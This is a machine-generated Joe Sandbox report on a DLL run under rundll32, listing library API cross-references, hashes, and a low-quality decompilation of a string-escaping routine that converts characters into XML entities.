Part of subcall function 10015280: mv_freep.F072 ref: 100154A6
Part of subcall function 10015280: mv_freep.F072 ref: 100154B5
Part of subcall function 10015280: mv_freep.F072 ref: 100154C1
Part of subcall function 10015280: mv_freep.F072 ref: 10015517
Part of subcall function 10015280: mv_freep.F072 ref: 10015523

mv_expr_free.F072 ref: 100172BB

Part of subcall function 10015280: mv_freep.F072 ref: 100152FA
Part of subcall function 10015280: mv_freep.F072 ref: 10015306
Part of subcall function 10015280: mv_freep.F072 ref: 1001534D
Part of subcall function 10015280: mv_freep.F072 ref: 10015359
Part of subcall function 10015280: mv_freep.F072 ref: 10015368
Part of subcall function 10015280: mv_freep.F072 ref: 10015374
Part of subcall function 10015280: mv_freep.F072 ref: 100153D9
Part of subcall function 10015280: mv_freep.F072 ref: 100153E5

mv_expr_free.F072 ref: 1001730E
mv_expr_free.F072 ref: 1001731D
mv_expr_free.F072 ref: 1001732C
mv_freep.F072 ref: 1001733B
mv_freep.F072 ref: 10017347
mv_expr_free.F072 ref: 10017361
mv_expr_free.F072 ref: 10017370
mv_expr_free.F072 ref: 1001737F
mv_freep.F072 ref: 1001738E
mv_freep.F072 ref: 1001739A
mv_freep.F072 ref: 100173A9
mv_freep.F072 ref: 100173B5
mv_expr_free.F072 ref: 100173DE
mv_expr_free.F072 ref: 100173ED
mv_expr_free.F072 ref: 100173FC
mv_freep.F072 ref: 1001740B
mv_freep.F072 ref: 10017417
mv_expr_free.F072 ref: 10017431
mv_expr_free.F072 ref: 10017440
mv_expr_free.F072 ref: 1001744F
mv_freep.F072 ref: 1001745E
mv_freep.F072 ref: 1001746A
mv_expr_free.F072 ref: 10017484
mv_expr_free.F072 ref: 10017493
mv_expr_free.F072 ref: 100174A2
mv_freep.F072 ref: 100174B1
mv_freep.F072 ref: 100174BD
mv_freep.F072 ref: 100174CC
mv_freep.F072 ref: 100174D8
mv_expr_free.F072 ref: 10017501
mv_expr_free.F072 ref: 10017510
mv_expr_free.F072 ref: 1001751F
mv_freep.F072 ref: 1001752E
mv_freep.F072 ref: 1001753A
mv_expr_free.F072 ref: 10017554
mv_expr_free.F072 ref: 10017563
mv_expr_free.F072 ref: 10017572
mv_freep.F072 ref: 10017581
mv_freep.F072 ref: 1001758D
mv_expr_free.F072 ref: 100175A7
mv_expr_free.F072 ref: 100175B6
mv_expr_free.F072 ref: 100175C5
mv_freep.F072 ref: 100175D4
mv_freep.F072 ref: 100175E0
mv_freep.F072 ref: 100175EF
mv_freep.F072 ref: 100175FB
mv_freep.F072 ref: 1001760A
mv_freep.F072 ref: 10017616

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_expr_free$mv_log
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 75827668-1422635149
Opcode ID: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
Instruction ID: 39916f313f6673765a40fa09fad6d79edb9ef4feb13054b409069c6d602bd34a
Opcode Fuzzy Hash: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
Instruction Fuzzy Hash: F3C133B95097459FC784EFA8D18591ABBF0FF88290F85586DF8C58B311D635E880CB92

Uniqueness

Uniqueness Score: -1.00%

Function 100177F0 Relevance: 75.3, APIs: 50, Instructions: 291COMMON

Download Yara Rule

APIs

mv_expr_parse.F072 ref: 10017862

Part of subcall function 10017110: strlen.MSVCRT ref: 10017141
Part of subcall function 10017110: mv_malloc.F072 ref: 1001714A

mv_expr_free.F072 ref: 100178D7
mv_expr_free.F072 ref: 100178E6
mv_expr_free.F072 ref: 100178F5
mv_freep.F072 ref: 10017904
mv_freep.F072 ref: 1001790C
mv_expr_free.F072 ref: 10017926
mv_expr_free.F072 ref: 10017935
mv_expr_free.F072 ref: 10017944
mv_freep.F072 ref: 10017953
mv_freep.F072 ref: 1001795B
mv_expr_free.F072 ref: 10017975
mv_expr_free.F072 ref: 10017984
mv_expr_free.F072 ref: 10017993
mv_freep.F072 ref: 100179A2
mv_freep.F072 ref: 100179AA
mv_freep.F072 ref: 100179B9
mv_freep.F072 ref: 100179C5
mv_expr_free.F072 ref: 100179EE
mv_freep.F072 ref: 10017A1B
mv_freep.F072 ref: 10017A23
mv_freep.F072 ref: 10017A79
mv_freep.F072 ref: 10017A81
mv_expr_free.F072 ref: 10017A6A

Part of subcall function 10015280: mv_freep.F072 ref: 100159C5
Part of subcall function 10015280: mv_freep.F072 ref: 100159D1
Part of subcall function 10015280: mv_freep.F072 ref: 100159E0
Part of subcall function 10015280: mv_freep.F072 ref: 100159EC
Part of subcall function 10015280: mv_freep.F072 ref: 100159FB
Part of subcall function 10015280: mv_freep.F072 ref: 10015A07
Part of subcall function 10015280: mv_freep.F072 ref: 10015A16
Part of subcall function 10015280: mv_freep.F072 ref: 10015A22

mv_expr_free.F072 ref: 10017A5B

Part of subcall function 10015280: mv_freep.F072 ref: 1001584F
Part of subcall function 10015280: mv_freep.F072 ref: 1001585B
Part of subcall function 10015280: mv_freep.F072 ref: 100158A2
Part of subcall function 10015280: mv_freep.F072 ref: 100158AE
Part of subcall function 10015280: mv_freep.F072 ref: 100158BD
Part of subcall function 10015280: mv_freep.F072 ref: 100158C9
Part of subcall function 10015280: mv_freep.F072 ref: 1001591F
Part of subcall function 10015280: mv_freep.F072 ref: 1001592B
Part of subcall function 10015280: mv_freep.F072 ref: 10015972
Part of subcall function 10015280: mv_freep.F072 ref: 1001597E

mv_expr_free.F072 ref: 10017A4C

Part of subcall function 10015280: mv_freep.F072 ref: 100156C6
Part of subcall function 10015280: mv_freep.F072 ref: 100156D5
Part of subcall function 10015280: mv_freep.F072 ref: 100156E1
Part of subcall function 10015280: mv_freep.F072 ref: 100156F0
Part of subcall function 10015280: mv_freep.F072 ref: 100156FC
Part of subcall function 10015280: mv_freep.F072 ref: 10015770
Part of subcall function 10015280: mv_freep.F072 ref: 1001577C
Part of subcall function 10015280: mv_freep.F072 ref: 1001579A
Part of subcall function 10015280: mv_freep.F072 ref: 100157A6
Part of subcall function 10015280: mv_freep.F072 ref: 100157FC
Part of subcall function 10015280: mv_freep.F072 ref: 10015808

mv_freep.F072 ref: 10017A90
mv_freep.F072 ref: 10017A9C
mv_expr_free.F072 ref: 10017AC5
mv_expr_free.F072 ref: 10017AD4
mv_expr_free.F072 ref: 10017AE3
mv_freep.F072 ref: 10017AF2
mv_freep.F072 ref: 10017AFA
mv_expr_free.F072 ref: 10017B14
mv_expr_free.F072 ref: 10017B23
mv_expr_free.F072 ref: 10017B32
mv_freep.F072 ref: 10017B41
mv_freep.F072 ref: 10017B49
mv_expr_free.F072 ref: 10017A32

Part of subcall function 10015280: mv_freep.F072 ref: 10015588
Part of subcall function 10015280: mv_freep.F072 ref: 10015594
Part of subcall function 10015280: mv_freep.F072 ref: 100155DB
Part of subcall function 10015280: mv_freep.F072 ref: 100155E7
Part of subcall function 10015280: mv_freep.F072 ref: 100155F6
Part of subcall function 10015280: mv_freep.F072 ref: 10015602
Part of subcall function 10015280: mv_freep.F072 ref: 10015667
Part of subcall function 10015280: mv_freep.F072 ref: 10015673
Part of subcall function 10015280: mv_freep.F072 ref: 100156BA

mv_expr_free.F072 ref: 10017A0C

Part of subcall function 10015280: mv_freep.F072 ref: 1001542C
Part of subcall function 10015280: mv_freep.F072 ref: 10015438
Part of subcall function 10015280: mv_freep.F072 ref: 10015447
Part of subcall function 10015280: mv_freep.F072 ref: 10015453
Part of subcall function 10015280: mv_freep.F072 ref: 1001549A
Part of subcall function 10015280: mv_freep.F072 ref: 100154A6
Part of subcall function 10015280: mv_freep.F072 ref: 100154B5
Part of subcall function 10015280: mv_freep.F072 ref: 100154C1
Part of subcall function 10015280: mv_freep.F072 ref: 10015517
Part of subcall function 10015280: mv_freep.F072 ref: 10015523

mv_expr_free.F072 ref: 100179FD

Part of subcall function 10015280: mv_freep.F072 ref: 100152FA
Part of subcall function 10015280: mv_freep.F072 ref: 10015306
Part of subcall function 10015280: mv_freep.F072 ref: 1001534D
Part of subcall function 10015280: mv_freep.F072 ref: 10015359
Part of subcall function 10015280: mv_freep.F072 ref: 10015368
Part of subcall function 10015280: mv_freep.F072 ref: 10015374
Part of subcall function 10015280: mv_freep.F072 ref: 100153D9
Part of subcall function 10015280: mv_freep.F072 ref: 100153E5

mv_expr_free.F072 ref: 10017B63
mv_expr_free.F072 ref: 10017B72
mv_expr_free.F072 ref: 10017B81
mv_freep.F072 ref: 10017B90
mv_freep.F072 ref: 10017B98
mv_freep.F072 ref: 10017BA7
mv_freep.F072 ref: 10017BB3
mv_freep.F072 ref: 10017BC2
mv_freep.F072 ref: 10017BCE

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_expr_free$mv_expr_parsemv_mallocstrlen
String ID:
API String ID: 1389959791-0
Opcode ID: 8fc3577bfb7cae8029ba773bfad3d65c292d51f5e7331e78cc098861103f96c6
Instruction ID: 11b1eda091ece5b6f93ddcdca37633d3328e67849ea26751cca1a066e4925893
Opcode Fuzzy Hash: 8fc3577bfb7cae8029ba773bfad3d65c292d51f5e7331e78cc098861103f96c6
Instruction Fuzzy Hash: 75D153B9A187058FC750EF68D08591ABBF0FF89254F458D6DE9D48B312D736E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009730 Relevance: 51.1, APIs: 23, Strings: 6, Instructions: 372
stringCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E10009730(int _a4, int _a8, unsigned int _a12, void** _a16, void* _a20) {
				char _v29;
				signed int _v32;
				int _v36;
				char _v37;
				void** _v40;
				signed int _v44;
				char** _v52;
				int _v56;
				int __ebx;
				int __edi;
				signed int __esi;
				int __ebp;
				signed int _t114;
				void** _t115;
				int _t116;
				int _t117;
				void* _t118;
				void* _t119;
				int _t120;
				void* _t121;
				signed char _t123;
				void* _t124;
				signed char* _t129;
				int _t130;
				void* _t133;
				unsigned int _t135;
				int _t136;
				signed int _t137;
				char _t146;
				void* _t150;
				int _t157;
				signed int _t158;
				void* _t163;
				void* _t164;
				void* _t167;
				void** _t170;
				int _t172;
				int _t173;
				int _t174;
				void* _t175;
				void** _t178;
				void*** _t179;
				void** _t180;

				_t179 =  &_v44;
				_t170 = _a4;
				_t129 = _a8;
				_v44 = _a12;
				_t112 = _a16;
				if(_a16 == 2) {
					L1();
					_t114 =  *_t129 & 0x000000ff;
					__eflags = _t114;
					if(_t114 != 0) {
						while(1) {
							L56:
							__eflags = _t114 - 0x27;
							if(_t114 == 0x27) {
								break;
							}
							_t129 =  &(_t129[1]);
							L1();
							_t114 =  *_t129 & 0x000000ff;
							__eflags = _t114;
							if(_t114 != 0) {
								continue;
							}
							goto L58;
						}
						 *_t179 = _t170;
						_t129 =  &(_t129[1]);
						_v56 = 0x100af503;
						L100089C0();
						_t114 =  *_t129 & 0x000000ff;
						__eflags = _t114;
						if(_t114 != 0) {
							goto L56;
						} else {
						}
					}
					L58:
					_t179 =  &(_t179[0xb]);
					_t112 = _t170;
					_pop(_t129);
					_pop(_t170);
					_pop(_t161);
					_pop(_t177);
					_t178 = _t112;
					_push(_t170);
					_push(_t129);
					_t115 =  &(_t112[4]);
					_t180 = _t179 - 0x2c;
					_v29 = 0x27;
					_t130 =  *(_t115 - 8);
					_v40 = _t115;
					while(1) {
						_t116 = _a4;
						_t144 =  <=  ? _t116 : _t130;
						_t172 = _t130 - ( <=  ? _t116 : _t130);
						if(_t172 > 1) {
							break;
						}
						_t135 = _a12;
						if(_t116 >= _t130 || _t135 == _t130) {
							L22:
							__eflags = _t172;
							if(_t172 != 0) {
								_t172 = 1;
								break;
							}
						} else {
							_t154 =  >  ? 1 : 0xfffffffe - _t116;
							_t17 = _t116 + 1; // 0xffffffff
							_t121 = ( >  ? 1 : 0xfffffffe - _t116) + _t17;
							if(_t135 >> 1 >= _t130) {
								_t130 = _t130 + _t130;
								__eflags = _t130;
							} else {
								_t130 = _t135;
							}
							if(_t130 < _t121) {
								_t125 =  <=  ? _t135 : _t121;
								_t130 =  <=  ? _t135 : _t121;
							}
							_t163 =  *_t178;
							_v56 = _t130;
							if(_t163 == _v40) {
								 *_t180 = 0;
								_t123 = L10028DA0();
								__eflags = _t123;
								if(_t123 == 0) {
									goto L21;
								} else {
									goto L15;
								}
							} else {
								 *_t180 = _t163;
								_t123 = L10028DA0();
								if(_t123 == 0) {
									L21:
									_t116 = _a4;
									goto L22;
								} else {
									if(_t163 == 0) {
										L15:
										_t157 = _a4;
										_t164 = _t123;
										_t175 =  *_t178;
										_t136 = _t157 + 1;
										_v36 = _t175;
										__eflags = _t136 - 8;
										if(_t136 >= 8) {
											__eflags = _t123 & 0x00000001;
											if((_t123 & 0x00000001) != 0) {
												_t137 =  *_t175 & 0x000000ff;
												_t35 = _t123 + 1; // 0x1
												_t164 = _t35;
												_t175 = _t175 + 1;
												 *_t123 = _t137;
												_t136 = _t157;
											}
											__eflags = _t164 & 0x00000002;
											if((_t164 & 0x00000002) != 0) {
												_t158 =  *_t175 & 0x0000ffff;
												_t164 = _t164 + 2;
												_t175 = _t175 + 2;
												_t136 = _t136 - 2;
												 *(_t164 - 2) = _t158;
											}
											__eflags = _t164 & 0x00000004;
											if((_t164 & 0x00000004) == 0) {
												goto L16;
											} else {
												_t167 = _t164 + 4;
												 *(_t167 - 4) =  *_t175;
												_t124 = memcpy(_t167, _t175 + 4, _t136 - 4);
												_t180 =  &(_t180[3]);
												goto L8;
											}
										} else {
											L16:
											_t124 = memcpy(_t164, _t175, _t136);
											_t180 =  &(_t180[3]);
											goto L8;
										}
										goto L23;
									}
									L8:
									 *_t178 = _t124;
									_a8 = _t130;
									continue;
								}
							}
						}
						L23:
						__eflags = 0xfffffffa;
						_t149 =  >  ? 1 : 0xfffffffa - _t116;
						_t150 = ( >  ? 1 : 0xfffffffa - _t116) + _t116;
						_t117 = _a8;
						_a4 = 0xfffffffa;
						__eflags = _t117;
						if(_t117 != 0) {
							_t118 = _t117 - 1;
							__eflags = _t118 - 0xfffffffa;
							_t119 =  >  ? _t150 : _t118;
							 *((char*)( *_t178 + _t119)) = 0;
							return _t119;
						}
						return _t117;
						goto L122;
					}
					_t173 = _t172 - 1;
					__eflags = _t173;
					_t174 =  >  ? 1 : _t173;
					_t146 = _v29;
					_t133 =  *_t178 + _t116;
					__eflags = _t174;
					if(_t174 != 0) {
						_t120 = 0;
						__eflags = 0;
						do {
							 *((char*)(_t133 + _t120)) = _t146;
							_t120 = _t120 + 1;
							__eflags = _t120 - _t174;
						} while (_t120 < _t174);
						_t116 = _a4;
					}
					goto L23;
				} else {
					__eflags = __eax - 3;
					if(__eax != 3) {
						__eax =  *__ebx;
						__eflags = __al;
						if(__al != 0) {
							__eflags = __cl & 0x00000002;
							if((__cl & 0x00000002) == 0) {
								_v37 = 1;
								__ebp = _v44;
								__edi = __ebx;
								__eflags = _v44;
								if(_v44 == 0) {
									_v36 = __ecx;
									while(1) {
										 *__esp = " \n\t\r";
										__ebp = __al;
										_v56 = __ebp;
										__eax = strchr(??, ??);
										_v56 = __ebp;
										 *__esp = "\'\\";
										_v44 = __eax;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax == 0) {
											goto L118;
										}
										L113:
										__edx = 0x5c;
										__eax = __esi;
										L1();
										L114:
										__edx =  *__edi;
										__eax = __esi;
										__edi = __edi + 1;
										L1();
										__eax =  *__edi & 0x000000ff;
										__eflags = __al;
										if(__al != 0) {
											__eflags = __ebx - __edi;
											if(__ebx == __edi) {
												_v37 = 1;
											} else {
												__eflags =  *(__edi + 1);
												_v37 =  *(__edi + 1) == 0;
											}
											continue;
										}
										goto L53;
										L118:
										__edx = _v44;
										__eflags = _v44;
										if(_v44 != 0) {
											__eflags = _v36 & 0x00000001;
											if((_v36 & 0x00000001) != 0) {
												goto L113;
											} else {
												__eflags = _v37;
												if(_v37 != 0) {
													goto L113;
												} else {
												}
											}
										}
										goto L114;
									}
								} else {
									_v32 = __ecx;
									while(1) {
										 *__esp = " \n\t\r";
										__ebp = __al;
										_v56 = __ebp;
										__eax = strchr(??, ??);
										_v56 = __ebp;
										_v36 = __eax;
										__eax = _v44;
										 *__esp = _v44;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax == 0) {
											goto L97;
										}
										L70:
										__edx = 0x5c;
										__eax = __esi;
										L1();
										L71:
										__edx =  *__edi;
										__eax = __esi;
										__edi = __edi + 1;
										L1();
										__eax =  *__edi & 0x000000ff;
										__eflags = __al;
										if(__al != 0) {
											__eflags = __ebx - __edi;
											if(__ebx == __edi) {
												_v37 = 1;
											} else {
												__eflags =  *(__edi + 1);
												_v37 =  *(__edi + 1) == 0;
											}
											continue;
										}
										goto L53;
										L97:
										__eax = strchr("\'\\", __ebp);
										__eflags = __eax;
										if(__eax != 0) {
											goto L70;
										} else {
											__eax = _v36;
											__eflags = _v36;
											if(_v36 != 0) {
												__eflags = _v32 & 0x00000001;
												if((_v32 & 0x00000001) != 0) {
													goto L70;
												} else {
													__eflags = _v37;
													if(_v37 != 0) {
														goto L70;
													} else {
													}
												}
											}
										}
										goto L71;
									}
								}
							} else {
								__edx = _v44;
								__eflags = _v44;
								if(_v44 == 0) {
									while(1) {
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eflags =  *__ebx;
										if( *__ebx == 0) {
											goto L53;
										}
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eflags =  *__ebx;
										if( *__ebx == 0) {
											return __eax;
										}
									}
								} else {
									do {
										_v56 = __eax;
										__eax = _v44;
										 *__esp = _v44;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax != 0) {
											__edx = 0x5c;
											__eax = __esi;
											L1();
										}
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eax =  *__ebx;
										__eflags = __al;
									} while (__al != 0);
								}
							}
						}
					} else {
						__eax =  *__ebx & 0x000000ff;
						__eflags = __al;
						if(__al != 0) {
							__edx = __ecx;
							__edx = __ecx & 0x00000008;
							__eflags = __cl & 0x00000004;
							if((__cl & 0x00000004) != 0) {
								__eflags = __edx;
								if(__edx == 0) {
									goto L85;
								} else {
									do {
										__dl = __al;
										__dl = __al - 0x22;
										__eflags = __dl - 0x1c;
										if(__dl > 0x1c) {
											L89:
											__edx = __al;
											__eax = __esi;
											L1();
											goto L90;
										}
										__edx = __dl & 0x000000ff;
										switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M100AF530))) {
											case 0:
												 *__esp = __esi;
												__eax = "&quot;";
												_v52 = "&quot;";
												__eax = 0x100af500;
												_v56 = 0x100af500;
												__eax = L100089C0();
												goto L90;
											case 1:
												goto L89;
											case 2:
												 *__esp = __esi;
												__eax = 0x100af508;
												_v52 = 0x100af508;
												__eax = 0x100af500;
												_v56 = 0x100af500;
												__eax = L100089C0();
												goto L90;
											case 3:
												 *__esp = __esi;
												__eax = "&apos;";
												_v52 = "&apos;";
												__eax = 0x100af500;
												_v56 = 0x100af500;
												__eax = L100089C0();
												goto L90;
											case 4:
												 *__esp = __esi;
												__edi = 0x100af50e;
												__ebp = 0x100af500;
												_v52 = 0x100af50e;
												_v56 = 0x100af500;
												__eax = L100089C0();
												goto L90;
											case 5:
												 *__esp = __esi;
												__edx = 0x100af513;
												__ecx = 0x100af500;
												_v52 = 0x100af513;
												_v56 = 0x100af500;
												__eax = L100089C0();
												goto L90;
										}
										L90:
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
									return __eax;
								}
								do {
									goto L85;
									L84:
									__eax =  *(__ebx + 1) & 0x000000ff;
									__ebx = __ebx + 1;
									__eflags = __al;
								} while (__al != 0);
								goto L53;
								L85:
								__eflags = __al - 0x3c;
								if(__eflags == 0) {
									 *__esp = __esi;
									__eax = 0x100af50e;
									__edx = 0x100af500;
									_v52 = 0x100af50e;
									_v56 = 0x100af500;
									__eax = L100089C0();
								} else {
									if(__eflags <= 0) {
										__eflags = __al - 0x26;
										if(__al == 0x26) {
											 *__esp = __esi;
											__eax = 0x100af508;
											_v52 = 0x100af508;
											__eax = 0x100af500;
											_v56 = 0x100af500;
											__eax = L100089C0();
										} else {
											__eflags = __al - 0x27;
											if(__al != 0x27) {
												goto L103;
											} else {
												 *__esp = __esi;
												__ebp = "&apos;";
												__eax = 0x100af500;
												_v52 = "&apos;";
												_v56 = 0x100af500;
												__eax = L100089C0();
											}
										}
									} else {
										__eflags = __al - 0x3e;
										if(__al != 0x3e) {
											L103:
											__edx = __al;
											__eax = __esi;
											L1();
										} else {
											 *__esp = __esi;
											__ecx = 0x100af513;
											__edi = 0x100af500;
											_v52 = 0x100af513;
											_v56 = 0x100af500;
											__eax = L100089C0();
										}
									}
								}
								goto L84;
							} else {
								__eflags = __edx;
								if(__edx == 0) {
									do {
										__eflags = __al - 0x3c;
										if(__al == 0x3c) {
											 *__esp = __esi;
											__ebp = 0x100af50e;
											__eax = 0x100af500;
											_v52 = 0x100af50e;
											_v56 = 0x100af500;
											__eax = L100089C0();
										} else {
											__eflags = __al - 0x3e;
											if(__al != 0x3e) {
												__eflags = __al - 0x26;
												if(__al == 0x26) {
													 *__esp = __esi;
													__eax = 0x100af508;
													_v52 = 0x100af508;
													__eax = 0x100af500;
													_v56 = 0x100af500;
													__eax = L100089C0();
												} else {
													__edx = __al;
													__eax = __esi;
													L1();
												}
											} else {
												 *__esp = __esi;
												__ecx = 0x100af513;
												__edi = 0x100af500;
												_v52 = 0x100af513;
												_v56 = 0x100af500;
												__eax = L100089C0();
											}
										}
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
								} else {
									do {
										__eflags = __al - 0x3c;
										if(__eflags == 0) {
											 *__esp = __esi;
											__edx = 0x100af50e;
											__ecx = 0x100af500;
											_v52 = 0x100af50e;
											_v56 = 0x100af500;
											__eax = L100089C0();
										} else {
											if(__eflags <= 0) {
												__eflags = __al - 0x22;
												if(__al == 0x22) {
													 *__esp = __esi;
													__eax = "&quot;";
													_v52 = "&quot;";
													__eax = 0x100af500;
													_v56 = 0x100af500;
													__eax = L100089C0();
												} else {
													__eflags = __al - 0x26;
													if(__al != 0x26) {
														goto L102;
													} else {
														 *__esp = __esi;
														__eax = 0x100af508;
														_v52 = 0x100af508;
														__eax = 0x100af500;
														_v56 = 0x100af500;
														__eax = L100089C0();
													}
												}
											} else {
												__eflags = __al - 0x3e;
												if(__al != 0x3e) {
													L102:
													__edx = __al;
													__eax = __esi;
													L1();
												} else {
													 *__esp = __esi;
													__edi = 0x100af513;
													__ebp = 0x100af500;
													_v52 = 0x100af513;
													_v56 = 0x100af500;
													__eax = L100089C0();
												}
											}
										}
										goto L41;
										L41:
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
								}
							}
						}
					}
					L53:
					return __eax;
				}
				L122:
			}

0x10009734
0x1000973b
0x1000973f
0x10009747
0x1000974b
0x10009752
0x10009877
0x1000987c
0x1000987f
0x10009881
0x10009890
0x10009890
0x10009890
0x10009892
0x00000000
0x00000000
0x10009897
0x1000989a
0x1000989f
0x100098a2
0x100098a4
0x00000000
0x00000000
0x00000000
0x100098a4
0x100098c0
0x100098c8
0x100098c9
0x100098cd
0x100098d2
0x100098d5
0x100098d7
0x00000000
0x00000000
0x100098d9
0x100098d7
0x100098a6
0x100098a6
0x100098a9
0x100098ab
0x100098b1
0x100098b2
0x100098b3
0x100086f1
0x100086f4
0x100086f5
0x100086f6
0x100086f9
0x100086fc
0x10008700
0x10008703
0x10008746
0x10008746
0x1000874f
0x10008752
0x10008757
0x00000000
0x00000000
0x1000875f
0x10008762
0x100087f4
0x100087f4
0x100087f6
0x1000882b
0x00000000
0x1000882b
0x10008770
0x1000877f
0x10008782
0x10008782
0x1000878c
0x10008710
0x10008710
0x1000878e
0x1000878e
0x1000878e
0x10008714
0x10008718
0x1000871b
0x1000871b
0x1000871d
0x10008720
0x1000872a
0x10008798
0x1000879f
0x100087a4
0x100087a6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000872c
0x1000872c
0x1000872f
0x10008736
0x100087f1
0x100087f1
0x00000000
0x1000873c
0x1000873e
0x100087a8
0x100087a8
0x100087ab
0x100087ad
0x100087b0
0x100087b3
0x100087b7
0x100087ba
0x100087c0
0x100087c2
0x10008859
0x1000885c
0x1000885c
0x1000885f
0x10008860
0x10008862
0x10008862
0x100087c8
0x100087ce
0x10008869
0x1000886c
0x1000886f
0x10008872
0x10008875
0x10008875
0x100087d4
0x100087da
0x00000000
0x100087dc
0x100087de
0x100087e7
0x100087ea
0x100087ea
0x00000000
0x100087ea
0x100087bc
0x100087bc
0x100087bc
0x100087bc
0x00000000
0x100087bc
0x00000000
0x100087ba
0x10008740
0x10008740
0x10008743
0x00000000
0x10008743
0x10008736
0x1000872a
0x100087f8
0x10008804
0x10008807
0x1000880a
0x1000880c
0x1000880f
0x10008812
0x10008814
0x10008816
0x10008817
0x10008819
0x1000881f
0x00000000
0x1000881f
0x1000882a
0x00000000
0x1000882a
0x10008833
0x10008839
0x1000883c
0x1000883f
0x10008844
0x10008846
0x10008848
0x1000884a
0x1000884a
0x1000884c
0x1000884c
0x1000884f
0x10008850
0x10008850
0x10008854
0x10008854
0x00000000
0x10009758
0x10009758
0x1000975b
0x10009808
0x1000980b
0x1000980d
0x1000980f
0x10009812
0x10009930
0x10009935
0x10009939
0x1000993b
0x1000993d
0x10009c70
0x10009c80
0x10009c80
0x10009c87
0x10009c8a
0x10009c8e
0x10009c93
0x10009c97
0x10009c9e
0x10009ca2
0x10009ca7
0x10009ca9
0x00000000
0x00000000
0x10009cab
0x10009cab
0x10009cb0
0x10009cb2
0x10009cb7
0x10009cb7
0x10009cba
0x10009cbc
0x10009cbd
0x10009cc2
0x10009cc5
0x10009cc7
0x10009ccd
0x10009ccf
0x10009ce0
0x10009cd1
0x10009cd1
0x10009cd5
0x10009cd5
0x00000000
0x10009ccf
0x00000000
0x10009cf0
0x10009cf0
0x10009cf4
0x10009cf6
0x10009cf8
0x10009cfd
0x00000000
0x10009cff
0x10009cff
0x10009d04
0x00000000
0x00000000
0x10009d06
0x10009d04
0x10009cfd
0x00000000
0x10009cf6
0x10009943
0x10009943
0x10009950
0x10009950
0x10009957
0x1000995a
0x1000995e
0x10009963
0x10009967
0x1000996b
0x1000996f
0x10009972
0x10009977
0x10009979
0x00000000
0x00000000
0x1000997f
0x1000997f
0x10009984
0x10009986
0x1000998b
0x1000998b
0x1000998e
0x10009990
0x10009991
0x10009996
0x10009999
0x1000999b
0x100099a1
0x100099a3
0x10009ba0
0x100099a9
0x100099a9
0x100099ad
0x100099ad
0x00000000
0x100099a3
0x00000000
0x10009b40
0x10009b4b
0x10009b50
0x10009b52
0x00000000
0x10009b58
0x10009b58
0x10009b5c
0x10009b5e
0x10009b64
0x10009b69
0x00000000
0x10009b6f
0x10009b6f
0x10009b74
0x00000000
0x00000000
0x10009b7a
0x10009b74
0x10009b69
0x10009b5e
0x00000000
0x10009b52
0x10009950
0x10009818
0x10009818
0x1000981c
0x1000981e
0x100099b8
0x100099b8
0x100099bb
0x100099bd
0x100099be
0x100099c3
0x100099c6
0x00000000
0x00000000
0x100099cc
0x100099cf
0x100099d1
0x100099d2
0x100099d7
0x100099da
0x00000000
0x00000000
0x100099da
0x00000000
0x10009830
0x10009830
0x10009834
0x10009838
0x1000983b
0x10009840
0x10009842
0x10009844
0x10009849
0x1000984b
0x1000984b
0x10009850
0x10009853
0x10009855
0x10009856
0x1000985b
0x1000985e
0x1000985e
